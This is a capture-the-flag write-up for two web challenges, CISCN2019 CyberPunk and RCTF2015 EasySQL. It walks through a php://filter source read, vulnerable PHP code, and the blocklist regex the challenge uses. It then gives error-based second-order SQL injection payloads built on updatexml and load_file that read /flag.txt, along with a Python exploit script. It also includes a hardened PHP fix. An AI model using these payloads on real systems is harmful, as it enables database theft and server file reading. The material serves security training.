[CISCN2019 华北赛区 Day1 Web5]CyberPunk


PHP wrapper (pseudo-protocol)

There is a ?file= parameter.

This is a lot like the earlier DMZCTF challenge!

When you see a file parameter, if it is not file inclusion, it is file reading!

/etc/passwd cannot be read directly.

So try a PHP wrapper!

http://9447554f-712e-49d9-9b22-f4952914729f.node3.buuoj.cn/?file=pHp://FilTer/convert.base64-encode/resource=index.php

Second-order injection | error-based injection

confirm.php

<?php

require_once "config.php";
//var_dump($_POST);

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    // keyword blocklist: checked against user_name and phone only, never against address
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = $_POST["address"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if($fetch->num_rows>0) {
        $msg = $user_name."已提交订单";
    }else{
        // address is inserted through a prepared statement, so the submitted value is stored verbatim
        $sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)";
        $re = $db->prepare($sql);
        $re->bind_param("sss", $user_name, $address, $phone);
        $re = $re->execute();
        if(!$re) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单提交成功";
    }
} else {
    $msg = "信息不全";
}
?>

change.php

<?php

require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = addslashes($_POST["address"]);
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        // the address stored by confirm.php is concatenated straight into the UPDATE: the second-order injection point
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            // the raw database error is echoed to the client
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单修改成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

Reading the source shows that neither confirm.php nor change.php filters $address! The keyword blocklist is only applied to user_name and phone, and confirm.php inserts address through a prepared statement, so whatever we submit is stored verbatim. change.php then reads the stored address back out of the table and concatenates it straight into the update statement.

So all we have to do is submit an order on index.php with a malicious value in address!

Then trigger any change in change.php and the malicious SQL runs!

Because change.php prints the database error (this is an error-based injection challenge!):

    if(!$result) {
        echo 'error';
        print_r($db->error);
        exit;
    }
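As an added example (not the challenge's own source), here is a hardened change.php that closes the second-order injection described above. The same bug class appears in the EasySQL challenge below, where a stored username is later spliced into the change-password query. The example assumes the same mysqli connection $db from config.php, that `user_id` is an integer column, and that mysqlnd is available for get_result(); the response message strings are kept from the original.

```php
<?php
// Added example, not the challenge's own code: change.php rewritten so that
// stored values are bound as parameters instead of concatenated into SQL.
// Assumes the mysqli connection $db from config.php and an integer user_id.
require_once "config.php";

$msg = '';

if (!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"])) {
    $user_name = $_POST["user_name"];
    $address   = $_POST["address"];   // no addslashes: parameter binding handles quoting
    $phone     = $_POST["phone"];

    // Look the order up with a prepared statement; with no string interpolation
    // the keyword blocklist (which the page shows is bypassable) is not needed.
    $stmt = $db->prepare("select `user_id`, `address` from `user` where `user_name`=? and `phone`=?");
    $stmt->bind_param("ss", $user_name, $phone);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();  // get_result() requires mysqlnd
    $stmt->close();

    if ($row) {
        // The address stored at confirm time is data, never SQL: binding it as a
        // parameter means it cannot change the shape of this UPDATE, which is
        // exactly what the concatenated version allowed.
        $upd = $db->prepare("update `user` set `address`=?, `old_address`=? where `user_id`=?");
        $upd->bind_param("ssi", $address, $row['address'], $row['user_id']);
        if (!$upd->execute()) {
            // Log the driver error server-side; never echo $db->error to the
            // client, because that echoed text is what error-based injection reads.
            error_log("change.php update failed: " . $upd->error);
            $msg = "订单修改失败";
        } else {
            $msg = "订单修改成功";
        }
        $upd->close();
    } else {
        $msg = "未找到订单!";
    }
} else {
    $msg = "信息不全";
}
?>
```

The two changes that matter are binding the value read back from the database (not only the value the user just posted) and keeping the database error out of the HTTP response; escaping at insert time, as addslashes tries to do, does not help once the stored string is concatenated again later.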

payload:

-1' and updatexml(1,concat(0x7e,database()),1)%23

-1' and updatexml(1,concat(0x7e,(select(load_file('/flag.txt'))),0x7e),1)#

Result (the updatexml error message is cut off at 32 characters, so the flag is truncated):
flag{d0dd9648-5996-4185-bec7-bb

-1' and updatexml(1,concat(0x7e,(select(substr((load_file('/flag.txt')),15,30))),0x7e),1)#

Result:
5996-4185-bec7-bbb018abc606}

Full flag:
flag{d0dd9648-5996-4185-bec7-bbb018abc606}

-1'/**/and/**/updatexml(1,concat(0x7e,(select(mid((load_file('/flag.txt')),15,30))),0x7e),1)#

mid and substr are interchangeable.
left: the number of characters to read from the left!
right: the number of characters to read from the right!

-1' and updatexml(1,concat(0x7e,(select(right((load_file('/flag.txt')),15))),0x7e),1)#

Another approach from a more experienced player:
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,20)),0x7e),1)#

Summary:

Two second-order injections in a row!

Quite interesting! The main skill tested is code auditing; source code of sites like this is worth reading carefully! 🙄🙄😶😶

[RCTF2015]EasySQL

The challenge title already gives it away, and there are two login forms, so it must be SQL injection! 😶😶😶 Enough said!

Registration does not even work!

If the value is not an email address, normal registration fails!!!

Normal registration is out!

So go straight in with a\ !

SQL injection: error-based injection

When registering:

Input: a\ a\ a\

Then, when changing the password, we see:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' "a\" and pwd='47bce5c74f589f4867dbd57e9ca9f808'   ' at line 1


The error reveals:
"a\" and pwd='47bce5c74f589f4867dbd57e9ca9f808'

So the statement can be reconstructed as:
select * from users where username="" and pwd='';


payload:

Tests:

select(id)from(c)where(id=1);

-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1);

(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))

(select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database()))

-1'/**/and/**/updatexml(1,concat(0x7e,(select((load_file('/flag.txt')))),0x7e),1)#


payload

Dump the tables:
upload'/**/&&/**/updatexml(1,concat(0x7e,(select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),0x7e),1)#

Dump the columns:
upload'/**/&&/**/updatexml(1,concat(0x7e,(select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')&&(column_name)REGEXP/**/'^u'),0x7e),1)#

upload"/**/&&/**/updatexml(1,concat(0x3a,(select/**/group_concat(0x23,real_flag_1s_here,0x23)/**/from/**/users/**/where(real_flag_1s_here)REGEXP/**/'^fla'),0x3a),1)#

Dump the data:
upload"&&(updatexml(1,concat(0x7e,(select(group_concat(0x40,real_flag_1s_here,0x40))from(users)where((real_flag_1s_here)REGEXP('^fla'))),0x7e),1))#

Result (truncated by the 32-character limit of the updatexml error):
flag{c7add9ad-b9ca-4f77-925d-5

upload"&&(updatexml(1,concat(0x7e,(select(group_concat(0x40,real_flag_1s_here,0x40))from(users)where((real_flag_1s_here)REGEXP('^7add9ad'))),0x7e),1))#

upload"&&(updatexml(1,concat(0x7e,reverse((select(group_concat(0x40,real_flag_1s_here,0x40))from(users)where((real_flag_1s_here)REGEXP/**/'^fla'))),0x7e),1))#

upload"&&(updatexml(1,concat(0x7e,reverse((select(group_concat(0x40,real_flag_1s_here,0x40))from(users)where((real_flag_1s_here)REGEXP('^fla')))),0x7e),1))#

reverse

SQL Server has a built-in reverse function whose main job is to reverse a string. For example:

https://www.cnblogs.com/fgynew/archive/2010/08/30/1812976.html

REGEXP (regular expressions)

MySQL regular expressions

https://www.runoob.com/mysql/mysql-regexp.html

Find all rows whose name field ends with 'ok':

mysql> SELECT name FROM person_tbl WHERE name REGEXP 'ok$';

Exploit script from a more experienced player:

import requests

url_reg = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/register.php'
url_log = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/login.php'
url_change = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/changepwd.php'

# prefix closes the username string; suffix closes the regexp(...) and updatexml(...) calls
pre = 'peri0d"'
suf = "'))),1))#"

# candidate first characters for the REGEXP anchor
s = list('abcdefghijklmnopqrstuvwxyz1234567890')

# one session so the login cookie is reused for changepwd
r = requests.session()

def register(name):
    data = {
        'username': name,
        'password': '123',
        'email': '123',
    }
    r.post(url=url_reg, data=data)

def login(name):
    data = {
        'username': name,
        'password': '123',
    }
    r.post(url=url_log, data=data)

def changepwd():
    # the stored username is spliced into the change-password query; the error text carries the result
    data = {
        'oldpass': '',
        'newpass': '',
    }
    kk = r.post(url=url_change, data=data)
    if 'target' not in kk.text:
        print(kk.text)

for i in s:
    payload = pre + "||(updatexml(1,concat((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf
    register(payload)
    login(payload)
    changepwd()